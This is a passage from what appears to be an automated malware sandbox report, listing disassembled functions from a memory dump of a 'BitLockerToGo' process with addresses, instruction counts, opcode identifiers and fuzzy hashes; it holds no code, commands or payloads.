                                                              • Instruction ID: 01b6803bfc80bf77d99318a07ec1b635fd79e9a38d11e68c39e1548f42d5ead9
                                                              • Opcode Fuzzy Hash: 95b3c9c87028eb14cea58240f0f43c0a9495de390a54595e6c445cfc91740dce
                                                              • Instruction Fuzzy Hash: 2A3104B08183919BD710CF54E4A436FBBA6AFC6308F98091DE9815B781D339D904CBD3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF8160 Relevance: .8, Instructions: 787COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b3484146926eacc29ab87b0752c6682971377b9ed03794b3d069aa3772130e4
                                                              • Instruction ID: c486140ee032582b482201e0006cd038a87775d81ebafa7f36fd77c5b04d3367
                                                              • Opcode Fuzzy Hash: 1b3484146926eacc29ab87b0752c6682971377b9ed03794b3d069aa3772130e4
                                                              • Instruction Fuzzy Hash: 2242D2316087128BC7A5DF18D8807BAB3E1FFC4318F194A2DDAC697285E334EA55CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D27620 Relevance: .7, Instructions: 727COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa0d323469e8bc422a234914c86f561b651520905a5c3b11bfdff34c540e72d8
                                                              • Instruction ID: 1509d2dd2239d876daaba47c22a42ebd48a66ff2c288210db78530b9dc378d50
                                                              • Opcode Fuzzy Hash: fa0d323469e8bc422a234914c86f561b651520905a5c3b11bfdff34c540e72d8
                                                              • Instruction Fuzzy Hash: E1428C716083519FE324CF18C890B2AFBE2BB95318F188A2DE5D597391D771E809CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF3780 Relevance: .7, Instructions: 694COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25a1801816baaef0437f854e602f84fb005283c5716de19f461ad0cdef3beb3e
                                                              • Instruction ID: 10bf709f09ac1b0650bdb27084f5bdc70959ce941ec5fb1df71b585e6e561d8c
                                                              • Opcode Fuzzy Hash: 25a1801816baaef0437f854e602f84fb005283c5716de19f461ad0cdef3beb3e
                                                              • Instruction Fuzzy Hash: 2152DE315087818FC7A9CF29C09026BF7E1FF88314F188AADEADA57751D735A945CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF41C0 Relevance: .6, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b32ddaee4e6348dae33356e10ad8869261a92eea9710855659690bb52f63b714
                                                              • Instruction ID: 1cdf0625e6cf512919ed68ff68ca1df9b07022fb65885e8d209f6117fdb6cb2e
                                                              • Opcode Fuzzy Hash: b32ddaee4e6348dae33356e10ad8869261a92eea9710855659690bb52f63b714
                                                              • Instruction Fuzzy Hash: 374210B0614B518FC3B8CF29C58066ABBF1BF85710B548A2ED69B8BA90D735F945CB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF64E0 Relevance: .5, Instructions: 536COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 320f9457d9811d35962a5717522e12e8449ee388fccde226bb2a0a40e7134e8a
                                                              • Instruction ID: d675c0f14f3a8d583b4451fd6ec8d81bd82d7fec31c8dbfee72a21fc5d5fd7d7
                                                              • Opcode Fuzzy Hash: 320f9457d9811d35962a5717522e12e8449ee388fccde226bb2a0a40e7134e8a
                                                              • Instruction Fuzzy Hash: 0012C4366083408FDB58CF29C85076ABBE6EFC8304F18886DE999CB351DB35D945CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D0CCF0 Relevance: .5, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8db4128048226a3eaac9e7a6d9e4a678173cc8b5bc147b3ef23b5bce66d0e5bf
                                                              • Instruction ID: 81905e8b984f34e66f87b83a34760b03b828f1906f9de0fd863a9dd8cd7f2ea2
                                                              • Opcode Fuzzy Hash: 8db4128048226a3eaac9e7a6d9e4a678173cc8b5bc147b3ef23b5bce66d0e5bf
                                                              • Instruction Fuzzy Hash: F9F1BC71A18341CFD308CF28D890B2AB7E6FB89314F08896DE88697391D779EC55CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D012DF Relevance: .3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2de1e91cc803968566fa9cec665e3be56d310cd6267188eab02bd48b6afdb01
                                                              • Instruction ID: c21cc754d0b70840ac523b291a9fa0e6ecffd5a3c29c27747d6dfba9c8421a3f
                                                              • Opcode Fuzzy Hash: d2de1e91cc803968566fa9cec665e3be56d310cd6267188eab02bd48b6afdb01
                                                              • Instruction Fuzzy Hash: 209193B1510B858BE3248F25C8A476BBBF1BF49308F544A5CD4CB8BB91E7B9F8058B45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1BBF2 Relevance: .2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 949041d73f14e8a6e4b0108a3937a4b443b1a493de1bd35a20526cb7ce63b4a0
                                                              • Instruction ID: c17998e4cd6474bbe755da680b68dd3a78f6b7c30ffcf8ae2c37baeabc508ef4
                                                              • Opcode Fuzzy Hash: 949041d73f14e8a6e4b0108a3937a4b443b1a493de1bd35a20526cb7ce63b4a0
                                                              • Instruction Fuzzy Hash: 90A106716097408FC319CE38D4907A6BBE2BF96314F0D89ADD4AA8BBD6C735A805C751
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D11FA1 Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9d52aa2485c78a89edba2be6bcc5873e2e78ad65995e282a27a07b4642f525b
                                                              • Instruction ID: 81a8672210ee8169ac86129b81a2fb9587be864944d03e542a248f5a290f3cd4
                                                              • Opcode Fuzzy Hash: f9d52aa2485c78a89edba2be6bcc5873e2e78ad65995e282a27a07b4642f525b
                                                              • Instruction Fuzzy Hash: 36618D75A00A119FC364CF2CD891A22B7F2EB893147258B2CD9EAC7B95D731F851CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D249C0 Relevance: .2, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdc34c569aa9e6bf5e6529a9a5bddc9aab33dd62c947f4896f2aaf569758787c
                                                              • Instruction ID: 78f42ba5126c08ea809411909f72a3c3afe0270f61a4bd2cc3d7509f469c79f6
                                                              • Opcode Fuzzy Hash: bdc34c569aa9e6bf5e6529a9a5bddc9aab33dd62c947f4896f2aaf569758787c
                                                              • Instruction Fuzzy Hash: 0D515AB55087548FE314DF29D89475BBBE1BB88318F044A2DE4E987390E379DA088F92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D27220 Relevance: .2, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aad4b8eaeac6730851d6ea742e4fe5ff442e74585580eb39ae2298f6d684566c
                                                              • Instruction ID: 2755736dc998a9f92248ace0b7df6ef104f528a73e98a7d663a2ebf862406da5
                                                              • Opcode Fuzzy Hash: aad4b8eaeac6730851d6ea742e4fe5ff442e74585580eb39ae2298f6d684566c
                                                              • Instruction Fuzzy Hash: AF519A71A083519BE728CE14C4A4B2EFBA2FBD4318F18891DE4851B396D771DC49CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D186C5 Relevance: .2, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcd830741a9ace520c3adc80a52ca432fc8a77c6e0a8a113221ac3d091baae58
                                                              • Instruction ID: 0e5954dae7ec90e31bf2b8392ac99f9d1f003a2e46c20762d1b0ae50ce66063e
                                                              • Opcode Fuzzy Hash: bcd830741a9ace520c3adc80a52ca432fc8a77c6e0a8a113221ac3d091baae58
                                                              • Instruction Fuzzy Hash: 2951D370545B808AE726CF3990907E3BBF1BF56308F44499DD0EE8BB82D736A40ADB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D136F0 Relevance: .2, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e90ec77551eb513010431446964bf51109bf82e29aed8ae917bbca7102a0aa96
                                                              • Instruction ID: 5ca2fc88277c89678b13e330f966fe377d5b1ea786dd1b6d03246f53f2cc3d9a
                                                              • Opcode Fuzzy Hash: e90ec77551eb513010431446964bf51109bf82e29aed8ae917bbca7102a0aa96
                                                              • Instruction Fuzzy Hash: 0A41C771604B415FC735CF29D490666F7F2BF8622471887ADD4A69BB81D730F90ACB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF31D0 Relevance: .2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ac27487cc0ea3c12040a31c984e2b93c5c38833f0a35048b66eb582b522936b
                                                              • Instruction ID: 2050423adfd98398ee170f7ae8527759f66aae9914b83f2746fb4cb3bc537558
                                                              • Opcode Fuzzy Hash: 2ac27487cc0ea3c12040a31c984e2b93c5c38833f0a35048b66eb582b522936b
                                                              • Instruction Fuzzy Hash: 0541E632B081E55BCB54CA2DCC5027EBAD39FC5248F0DC579E9C9DB346E634D9058394
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D04C00 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34ef6e0f8d330fa4c0ec089e630d8d34eb7f5f3652cff57bc7ba23ec18586f22
                                                              • Instruction ID: 98d6b85662e0ee28b606b1c8993bc2c92a9eb302aa80ae3b8a71c0193e7c0d55
                                                              • Opcode Fuzzy Hash: 34ef6e0f8d330fa4c0ec089e630d8d34eb7f5f3652cff57bc7ba23ec18586f22
                                                              • Instruction Fuzzy Hash: B24144B29083489BC3219F64D8C0F6AB7E8EF91318F094668DA99473F1EB71DC04C766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D292A1 Relevance: .1, Instructions: 142COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17377993f71e6f997b53e88de92afc6f6eeeaf260b2207b93afa2b362584b83e
                                                              • Instruction ID: 26ffcb2ef17ce2c05457ee12a690f9106b46be239298e83b07c75a7dc26d7ef5
                                                              • Opcode Fuzzy Hash: 17377993f71e6f997b53e88de92afc6f6eeeaf260b2207b93afa2b362584b83e
                                                              • Instruction Fuzzy Hash: 2751B3716457518FD3258F14C8647A2BBF1FF56318F288A49C4868BB46C375EC4ACF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CFFDE0 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b92bc6a654ff9593cf297245cbeaefa403bf4a866405172bcd759a0e32a0d79a
                                                              • Instruction ID: 26ec7ac87949afe617af262c64830175abe62218d5391f13d4776a8f1f2a083f
                                                              • Opcode Fuzzy Hash: b92bc6a654ff9593cf297245cbeaefa403bf4a866405172bcd759a0e32a0d79a
                                                              • Instruction Fuzzy Hash: D5411476B182900FD398CE3A889012ABBD2DBC5610F19CA3DF1E5C76D5E675CA06D750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D026D2 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02c9ebdbcda792749b099868cea295613f4690d1edf6c99fb1c4c012f8572c4c
                                                              • Instruction ID: 4e1da591b2e3f829352afba6c67229b86c6cd4ef75ea69b2a2c8cea468c22f1f
                                                              • Opcode Fuzzy Hash: 02c9ebdbcda792749b099868cea295613f4690d1edf6c99fb1c4c012f8572c4c
                                                              • Instruction Fuzzy Hash: 9C317CB5A057018FC729CF28C8C8762B7E6BF89314F189A6DC966877A1D7B0F845CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF3390 Relevance: .1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23ec1d17770a5ebc5e53d9b9656e1c0de43441dff1b71a98f6682320371d5a91
                                                              • Instruction ID: fb370526871847c77a384ffecd433675507d2833fc7a76fc08c0ae5ee20cadd7
                                                              • Opcode Fuzzy Hash: 23ec1d17770a5ebc5e53d9b9656e1c0de43441dff1b71a98f6682320371d5a91
                                                              • Instruction Fuzzy Hash: A721D331B581F10BDBE1CB39D8C056BBFA2DBC611671F45BADBC0E7742D225E81A8660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF2610 Relevance: .1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef52320defdfa9c64950d63ffd7b5db08fa6e77bcd588ee95977c7bc57c46d18
                                                              • Instruction ID: f850bdc043a4895856e81964194ee6009052f63a482916f30d42b113c5ab13a8
                                                              • Opcode Fuzzy Hash: ef52320defdfa9c64950d63ffd7b5db08fa6e77bcd588ee95977c7bc57c46d18
                                                              • Instruction Fuzzy Hash: CF31D7306042009BD7D49E59D880A2AB7E1EFC8318F188A2DEE99CB351D731DD52CB43
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D047A1 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54f8223deb48fea389cebd021700c72e6d5511d0402b6d233a3c72cbef3fdc7a
                                                              • Instruction ID: 1c848162958835a66883a8278108be56ba4bf9f778be316a2115f5c031c1a5b5
                                                              • Opcode Fuzzy Hash: 54f8223deb48fea389cebd021700c72e6d5511d0402b6d233a3c72cbef3fdc7a
                                                              • Instruction Fuzzy Hash: CF21F774611B808BD768DF20C8A4BA7B7E3BB95309F144A1CC1971BB95CB71AC05DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D27110 Relevance: .1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae944415d58a384639d7390dd97809520c04d53dc4f7b6fabeeca3d8eefe077e
                                                              • Instruction ID: 0dfd0c16559157dc5e8318d7583528cf2d059963cf083096a71dc4ce71368272
                                                              • Opcode Fuzzy Hash: ae944415d58a384639d7390dd97809520c04d53dc4f7b6fabeeca3d8eefe077e
                                                              • Instruction Fuzzy Hash: E5217C716083019BE728CF04C4A4B2BF7A2EFD5318F148A1DE4A51B385D7719909CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D03B97 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e69b1337a512901fb2de6fa3c63d8847493ecbf0b3a002a032e7542a6e4b0408
                                                              • Instruction ID: 95383aeca16ced08b2d3a3d020558a10f9d3bed6f32fa242cdbb3e170d84f76b
                                                              • Opcode Fuzzy Hash: e69b1337a512901fb2de6fa3c63d8847493ecbf0b3a002a032e7542a6e4b0408
                                                              • Instruction Fuzzy Hash: C221CF35650B418BD7248F24C884B26B3E2BB8A308F148A5CD4C397BE5D7B1FC45CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2934E Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8045efd261281c00f39e9d5ee114e5334e356ce2d48108e54f0cb9a50e258745
                                                              • Instruction ID: 39b2cb04e8d0862afb707ba13dfb42e8118c9514c675628822be469a95cbbd47
                                                              • Opcode Fuzzy Hash: 8045efd261281c00f39e9d5ee114e5334e356ce2d48108e54f0cb9a50e258745
                                                              • Instruction Fuzzy Hash: A811E1396097928BC728CF39C9615B2B7F3BF96208318685EC4D2C7781DB78E816C714
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D230D0 Relevance: .1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                              • Instruction ID: ddfaf1400e6cc68a35574a80ffcbe3b08c68ae76c10034dd8e126806ed87d590
                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                              • Instruction Fuzzy Hash: 53118633A091F40EC3568D3C88006A5BFE30AA3539B5953D9F4F89B3D6D6268D8EC365
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D13880 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b669a96d2502376addc037353a48b29e2af4a1f0f83d9d46ae6f1014e29c7578
                                                              • Instruction ID: 025c802d690f41901ec134f26b7efce1e1f4cd62411df8e7fa6ff0bccd86b33a
                                                              • Opcode Fuzzy Hash: b669a96d2502376addc037353a48b29e2af4a1f0f83d9d46ae6f1014e29c7578
                                                              • Instruction Fuzzy Hash: 5E0171F5B0030167DBE0AF54A8D0727F2A9AF81708F18457CD90957701DB76EC06DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D01114 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64793ac68d746bc0c342c885a144eb4b5e6dccb9de26e80ce5b6d12766413e6b
                                                              • Instruction ID: 880c9f9b3d514c25384fd0aff96b2a72aa9dd9810113218e71a90000327f6393
                                                              • Opcode Fuzzy Hash: 64793ac68d746bc0c342c885a144eb4b5e6dccb9de26e80ce5b6d12766413e6b
                                                              • Instruction Fuzzy Hash: C91121715097814FD326CF24C498767BFF2AF86304F19899EC4D68B692C775E80ACB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D117EE Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4b88fc11bb6d2380729816ced2cd4e417297d3d1b1b98f97eeaec5da9395532
                                                              • Instruction ID: 9bc2c8da0d8fa0d6fc79156a0ebc8ac84b98d19a9bc0bc7aef7b27f564740199
                                                              • Opcode Fuzzy Hash: e4b88fc11bb6d2380729816ced2cd4e417297d3d1b1b98f97eeaec5da9395532
                                                              • Instruction Fuzzy Hash: 011125B0601602DBD318CF28E5A4B17FBF2BF0A704F04895CC49A8BB92C775E855CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2A6E8 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d0e802915a5efea327527d4a6decd6b8dd4bd247acaf2e52eea6b8972f1cff8
                                                              • Instruction ID: 02f20d5d4e9089a679f11182df01da168cf4757e50f3b384eb932bd879091972
                                                              • Opcode Fuzzy Hash: 3d0e802915a5efea327527d4a6decd6b8dd4bd247acaf2e52eea6b8972f1cff8
                                                              • Instruction Fuzzy Hash: 68F0D475E451058FC708CF18D080864FBB5FB593147119559D959AB322C730EC60CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D2A720 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
